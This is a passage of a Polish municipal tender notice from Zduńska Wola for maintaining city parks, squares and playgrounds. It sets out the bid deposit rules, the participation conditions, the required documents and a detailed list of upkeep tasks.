Część nr 5 			        Zamawiający nie wymaga wadium.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r., Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Uwaga! Wadium wnoszone w poręczeniach, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w pkt 2 ppkt 5), należy zdeponować przed upływem terminu składania ofert w Kasie Urzędu Miasta Zduńska Wola (budynek nr 4, parter, pokój nr 411) a kopię wadium załączyć do oferty. Z treści tych dokumentów musi wynikać bezwarunkowe, (na każde pisemne żądanie zgłoszone przez Zamawiającego) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy. Wyżej wymienione gwarancje i poręczenia nie mogą wprowadzać żadnych dodatkowych warunków merytorycznych. Ponadto wadium wniesione w  formie gwarancji i poręczeń musi mieć taką samą płynność jak wadium wniesione w pieniądzu, co oznacza, że dochodzenie roszczenia z tytułu zapłaty wadium nie może być utrudnione, w szczególności poprzez rozumienie terminu, w którym żądanie zapłaty Zamawiającego powinno dotrzeć do Gwaranta lub Poręczyciela  jako terminu ważności gwarancji i poręczeń.  Terminu, w którym żądanie zapłaty Zamawiającego powinno dotrzeć do Gwaranta lub Poręczyciela musi dawać możliwość realnego zaspokojenia roszczeń Zamawiającego z Gwarancji lub Poręczenia w przypadku zaistnienia w terminie związania ofertą któregokolwiek z przypadków, o których mowa w art 46 ust. 4a i 5 ustawy. Termin ten musi uwzględniać w szczególności czas niezbędny na dostarczenie pisemnego żądania zapłaty Zamawiającego do Gwaranta lub Poręczyciela.
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem przed upływem terminu składania ofert na rachunek bankowy Zamawiającego:
Bank Spółdzielczy w Poddębicach Nr konta 09 9263 0000 0544 0094 2005 0001
a dowód wniesienia wadium w postaci kopii dokonanego przelewu załączyć do oferty.
4. Wykonawca wnosząc wadium zobligowany jest do wskazania numeru części, której dotyczy wadium. W przypadku braku wskazania numeru części, której wadium dotyczy (przy jednoczesnym wniesieniu niższej od wymaganej łącznej wysokości wadium) oraz niemożności jednoznacznego przypisania wysokości wadium do poszczególnych części, Zamawiający wykluczy Wykonawcę z postępowania we wszystkich częściach na podstawie art. 24 ust 2 pkt 2 ustawy.
5. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6. Zamawiający dokona zwrotu wadium, zgodnie z warunkami określonymi w art. 46 ustawy. 
7. Wykonawca zobowiązany jest wnieść wadium na cały okres związania oferta, określony w rozdziale XI SIWZ.
8. Zamawiający zatrzymuje wadium zgodnie z warunkami określonymi w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że posiada: 
a) aktualne zezwolenie wydane przez organ właściwy na prowadzenie działalności w zakresie zbierania, transportowania i unieszkodliwiania odpadów będących przedmiotem zamówienia (Dz. U. z 2013 r., poz. 21 z późniejszymi zmianami).  - dla części 1 - 4,
b) aktualną decyzją Powiatowego Lekarza Weterynarii zatwierdzającą prowadzoną działalność w zakresie zbierania, transportu i usuwania ubocznych produktów pochodzenia zwierzęcego, a tym samym nadany weterynaryjny numer identyfikacyjny (zgodnie z ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. z 2008 r. nr 213, poz. 1342); - dla części 5.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną usługę odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o  wartości minimum w zł brutto: 

Część nr 1  - Zadanie I 			   90.000,00 zł 
Część nr 2  - Zadanie II			 100.000,00 zł
Część nr 3  - Zadanie III		           90.000,00 zł
Część nr 4 - Zadanie IV		           60.000,00 zł	 

W przypadku składania oferty na wybrane części lub całość zamówienia, Zamawiający uzna również jedno zamówienie o wartości odpowiadającej odpowiednio sumie wybranych części i dla całości zamówienia o wartości 340.000,00 zł.

Zamawiający informuje, że w przypadku dokumentów podanych w walucie innej niż PLN, przeliczanie wartości na walutę polską nastąpi na podstawie Tabeli A kursów średnich NBP z dnia ogłoszenia przedmiotowego przetargu do Biuletynu Zamówień Publicznych;

Część nr 5 - Zadanie V	 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 1 do SIWZ.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje sprzętem do realizacji zamówienia na każdą część:

Część nr 1- Zadanie I 
- pług dostosowany do odśnieżania alejek parkowych i chodników - 1 szt.;
- ciągnik z osprzętem ogrodniczym (kosiarka rotacyjna itp.) - 1 szt.;
- wykaszarka- 5 szt.;
- kosiarka mechaniczna - 3 szt. (w tym 1 szt. z koszem); 
- beczkowóz do podlewania - 1 szt.;
- opryskiwacz ręczny i mechaniczny - 1 szt.;
- dmuchawa - 2 szt.; 
- piła spalinowa  - 2 szt.;
- podnośnik do 16 metrów.
Część nr 2 - Zadanie II:
- pług dostosowany do odśnieżania chodników, ciągów pieszo-rowerowych i ścieżek rowerowych - 1szt.;
- ciągnik z osprzętem ogrodniczym (kosiarka rotacyjna itp.) - 1 szt.;
- wykaszarka - 5 szt.;
- kosiarka mechaniczna - 3 szt. (w tym 2 szt. z koszem);
- kosiarka bijakowa - 1 szt.;
- beczkowóz do podlewania - 1 szt.; 
- opryskiwacz ręczny i mechaniczny - 1 szt.;
- dmuchawa - 2 szt.;
- piła spalinowa  - 2 szt.;

Część nr 3  - Zadanie III:
- ciągnik z osprzętem ogrodniczym (kosiarka rotacyjna, pług do odśnieżania itp.) - 1 szt.;
- wykaszarka- 3 szt.;
- kosiarka mechaniczna  - 3 szt.;
- opryskiwacz ręczny i mechaniczny - 1 szt.;
- dmuchawa - 2 szt.; 
- piła spalinowa  - 2 szt.;

Część nr 4 - Zadanie IV 
koparko-ładowarka (koparka podsiębierna, ciągnik) wraz z odmularką - pogłębiarką rowów - 1 szt.;
Samochód ciężarowy - 1 szt;
kosa spalinowa - 4 szt.;
piła spalinowa  - 2 szt.;
Część nr 5 - Zadanie V 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. Treść pełnomocnictwa powinna dokładnie określić zakres umocowania. Pełnomocnictwo musi być złożone w oryginale albo w formie kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.99</li>
<li>2 - Termin płatności - 0.01</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza niżej wymienione zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zgodnie z art. 144 ustawy w następujących przypadkach:
1.1. zmiana sposobu spełnienia świadczenia będzie możliwa w przypadku zmian legislacyjnych przepisów aktów prawnych normujących wykonanie przedmiotu zamówienia, w takim przypadku sposób spełnienia świadczenia zostanie zmieniony na zgodny z obowiązującymi przepisami w tym zakresie,,
2. W celu dokonania zmiany zapisów umowy wnioskowanych przez Stronę, zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich uzasadnieniem. Zmiany te muszą być korzystne lub neutralne dla Zamawiającego.
3. Wszelkie zmiany do umowy wymagają pisemnego aneksu podpisanego przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdunskawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Biurze Infrastruktury Technicznej - Dział Ochrony Środowiska UM oraz na stronie internetowej UM (www.zdunskawola.pl), lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2014 godzina 11:45, miejsce: W biurze Obsługi Interesantów Urzędu Miasta Zduńska Wola, ul. Złotnickiego 12. 98-220
Zduńska Wola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający dopuszcza możliwość wykluczenia z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe,w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Obejmuje utrzymanie terenów zieleni urządzonej  należących do  miasta Zduńska  Wola (parki, skwery, place zabaw)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany standard określa utrzymanie zieleni oraz czystości  i  zapewnia:
estetyczny wygląd terenu zgodny z zasadami przepisów porządkowych i sanitarnych, bezpieczny stan ciągów pieszych podczas występowania warunków zimowych, prawidłowy stan zieleni zgodny z zasadami sztuki ogrodniczej oraz wynikający z warunków agrotechnicznych i pogodowych,  należyty stan elementów małej architektury umożliwiający ich bezpieczne użytkowanie,
bezpieczny stan elementów placów zabaw.

Wymagane roboty na terenach zlokalizowanych w północnej części miasta  Zduńska Wola 
1. omiatanie alejek parkowych i zatok parkingowych, codziennie w okresie od kwietnia   do listopada (na terenie skweru Konstytucji 3-go Maja, przed budynkiem USC oraz przed Dworkiem Stefana Złotnickiego) na pozostałym terenie trzy razy w tygodniu
sprzątanie połamanych gałęzi, kwiatostanów i owoców drzew po wichurach niezależnie od ustalonej częstotliwości.
2. opróżnianie koszy, co drugi dzień do godziny 8 rano, malowanie koszy w terminie do dnia 1 maja,   konserwacja koszy (drobne naprawy) 
3. odśnieżanie  pieszo-jezdnych  ciągów komunikacyjnych, dróg dojazdowych  wewnętrznych, parkingów, alejek parkowych na szerokość  dostosowaną  do ich  szerokości (nie szerzej niż 2 m) nie później niż dwie  godziny od zakończenia opadów, przeciwdziałanie  śliskości, usuwanie błota pośniegowego z  wymienionych  utwardzonych  ciągów komunikacyjnych,
4. prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi,  zasypywanie dołów kopanych przez psy,  rozrzucanie kretowin itp - codziennie w okresie od kwietnia   do  listopada (na terenie skweru Konstytucji 3-go Maja, przed budynkiem USC oraz przed Dworkiem Stefana Złotnickiego) na pozostałym terenie dwa razy w tygodniu. Zbieranie zanieczyszczeń z terenów objętych   umową w  okresie zimowym   w przypadku wystąpienia zaśmiecenia terenu;
5. malowanie ławek parkowych w terminie do 1 maja, mycie zabrudzonych ławek wg potrzeb, naprawa   zniszczonych elementów  ławek tj. uzupełnianie brakujących śrub i desek zmalowaniem (malowanie  dwukrotne powierzchni po uprzednim zeszlifowaniem odstającej starej farby)
6. koszenie terenów zieleni   6 razy w sezonie (terminy koszenia uzgodnione z zamawiającym);
7. pielęgnacja  krzewów rosnących w  skupieniach i żywopłotach (odchwaszczanie,  przycinanie,  zasilanie 3 razy w sezonie wegetacyjnym, podlewanie w okresach suszy wg potrzeb
8.  zwalczanie (chemiczne i mechaniczne)  chwastów w alejkach i na powierzchniach  utwardzonych;
9.  jesienne wygrabianie liści z trawników (nie rzadziej niż 2 razy w tygodniu)
10.ułożenie okrywy zabezpieczającej przed przemarzaniem  roślin posadzonych w poprzednim i bieżącymroku (jeżeli wystąpią nasadzenia),
11. utrzymanie miejsc pamięci narodowej (mycie pomników, utrzymanie porządku, obsadzenia roślinami  miejsc  do tego przeznaczonych,  ustawianie zniczy i ułożenie  po jednej wiązance na świerku  w wymienionych niżej miejscach i  terminach:
   
 Cmentarz Katolicki    
       pomnik Honoraty Złotnickiej, płyta Stefana Złotnickiego                Święto Miasta i 1 listopada 
       Mogiła zbiorowa  + kwatera                                                                 1września i  1 listopada
       Mogiła siostry PCK                                                                              1września i  1 listopada
       Mogiła lotników                                                                                    1września i  1 listopada 
  Mogiła Sylli i Kałużewskiego (tylko wiązanka i znicze )                       1września i  1 listopada
Plac Wolności
płyta  Rozstrzelanym przez hitlerowców 11 listopada 1939 r.           1 września i 11 listopada
    pomnik Józefa Piłsudskiego                                                                                      11 listopada
                                                                                                                                                                                                                                                                                                          
12. opryski chemiczne drzew przeciw chorobom grzybowym i szkodnikom - 2 razy w sezonie
       wegetacyjnym
      kasztanowce, wiązy, głogi
3. opieka nad placami zabaw: konserwacja elementów statycznych i dynamicznych, uzupełnianie
     brakujących elementów - deski bale, siedziska, wymiana piasku  w piaskownicach 2 x w sezonie 
     (w terminie ustalonym z zamawiającym),  malowanie elementów drewnianych wymagających
     odświeżenia
14. przeciwdziałanie chemiczne i biologiczne  przeciwko  wykwitom glonów na stawach środkami  chemicznymi dopuszczonymi do obrotu.  Czyszczenie lustra wody przy brzegach skarp na stawach nie  rzadziej  niż 2 razy w tygodniu oraz czyszczenie zastawek z naniesionych śmieci w zależności od
     potrzeb, regulacja poziomu lustra wody  (wg poleceń Zamawiającego). Jednokrotne zarybienie  
     gatunkami roślinożernymi 200 kg narybku wg potrzeb
15. odchwaszczanie skarp stawów i rzeki  Pichny w granicach Parku Miejskiego
16. malowanie  barierek, słupków do tablic  informacyjnych, 1 raz w sezonie w terminie  uzgodnionym
      z zamawiającym;
17. mycie znaków i tablic informacyjnych, konserwacja i regulacja podpór zastosowanych do                                                                  
      zabezpieczenia  starodrzewu na terenie Parku Miejskiego ( w ustaleniu z Zamawiającym); 
18. dokarmianie i opieka nad łabędziem  oraz zapewnienie  miejsca schronienia w okresie zimowym
     (przetrzymanie łabędzia w miejscu schronienia i dokarmianie go w okresie zimy do następnego sezonu,
      przywiezienie z miejsca zimowania na staw w następnym sezonie  wiosennym w terminie uzgodnionym 
      z zamawiającym;
19. strącanie gniazd budowanych przez ptaki na drzewach poza okresem ochronnym określonym 
      w  ustawie o  ochronie przyrody (tj.  od 15 października - do końca lutego); 
20. ukwiecenia - w terminach ustalonych z zamawiającym bieżąca pielęgnacja kwietników, gazonów, oraz 
      rabat kwietnych (uzupełnianie roślin, zasilanie nawozami - 6 razy w sezonie wegetacyjnym  	podlewanie 
      na bieżąco);      
      * wymagana  norma nasadzeń dla  1 kwietnika typu  120 x120 - 6 pierścieni  o   konstrukcji  metalowej 
    1 sadzenie:
         sadzonki roślin pnących typu: surfinia, pelargonia, obsadzanych w systemie:
         1,2,4,6 warstwa - 50 sztuk. 
    2 i 3  sadzenie:( trzecie sadzenie wg potrzeb)
         sadzonki roślin o pędach wyprostowanych typu  chryzantemy, begonie, obsadzane w    
         systemie wszystkich warstw  -85 sztuk .    
Pozostałe gazony obsadzanie jw  w ilości dostosowanej do wielkości gazonów.
     * wymagana  norma nasadzeń na rabatach gruntowych: trzykrotna wymiana i uzupełnianie roślin
       jednorocznych:   
rodzaju: begonia łuskowata, starzec, szałwia, żeniszek, aksamitka, bratek, godecja, niecierpek 
w rozstawie 20 x20 cm;( do wyboru)

21. przyozdabianie kwietników igliwiem świerkowo-sosnowym na okres zimowy;

materiały niezbędne do realizacji zamówienia takie jak paliki, taśmy, nawozy, woda, opryski, piasek, kwiaty, znicze, stroisz, farby, deski  itp. należy wliczyć w cenę zamówienia.
Wymagane roboty na terenach zlokalizowanych w południowej części miasta  Zduńska Wola
Wykonawca zobowiązuje się do świadczenia na rzecz Zamawiającego następujących usług  zlokalizowanych w południowej części miasta  Zduńska Wola:  

1. omiatanie alejek parkowych - 2 razy w tygodniu;
2. opróżnianie koszy  - dwa razy w tygodniu do  godziny 8 rano, malowanie koszy w terminie do                  1 maja, konserwacja koszy - drobne naprawy;
3. odśnieżanie  alejek parkowych na szerokość   dostosowaną   do ich  szerokości (nie szerzej niż 2 m) nie później niż dwie godziny od zakończenia opadów; przeciwdziałanie  ich śliskości,  usuwanie błota pośniegowego z utwardzonych  ciągów komunikacyjnych;
4. prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi, zasypywanie dołów kopanych przez psy, rozrzucanie kretowin itp - dwa razy w tygodniu od kwietnia do listopada. Zbieranie śmieci z terenów objętych umową w pozostałym okresie trwania umowy - 
w przypadku wystąpienia zaśmiecenia terenu; 
5. malowanie ławek parkowych w terminie do 1 maja;  mycie zabrudzonych ławek wg potrzeb; naprawa zniszczonych elementów ławek tj. uzupełnianie brakujących śrub i desek z malowaniem ( malowanie dwukrotne powierzchni po uprzednim zeszlifowaniem odstającej starej farby);
6. koszenie terenów zieleni -  5 razy (termin koszenia uzgodniony  z zamawiającym);
7. pielęgnacja  krzewów rosnących w  skupinach i żywopłotach (odchwaszczanie, przycinanie, zasilanie  -  3 razy w sezonie wegetacyjnym, podlewanie w okresach suszy;
8. zwalczanie ( chemiczne i mechaniczne ) chwastów w alejkach i na powierzchniach utwardzonych;
9. jesienne wygrabianie liści z trawników (nie rzadziej niż 1 raz w tygodniu);
10. ułożenie okrywy zabezpieczającej przed przemarzaniem roślin posadzonych w poprzednim                          i bieżącym roku (jeżeli wystąpią nasadzenia);
11. opryski chemiczne drzew i krzewów  przeciw chorobom grzybowym i szkodnikom - 2 razy                     w sezonie wegetacyjnym - jeżeli wystąpią choroby grzybowe drzew;
12. opieka nad placami zabaw: konserwacja elementów statycznych i dynamicznych; uzupełnianie brakujących elementów - deski bale; siedziska; wymiana piasku  w piaskownicach -2 x w sezonie 
(w terminie ustalonym z zamawiającym),  malowanie elementów drewnianych wymagających odświeżenia;
13. mycie znaków i tablic informacyjnych (w zależności od potrzeb);
14. malowanie słupków do tablic  informacyjnych  w terminie  do 1 maja.
 Wymagane roboty na terenach przyległych do  zbiornika Kępina:  
1. koszenie terenów przyległych do zbiornika Kępina  -dwa razy w sezonie bez wywozu trawy             (w terminie uzgodnionym z zamawiającym),
2. malowanie ławek - 1 raz w sezonie,
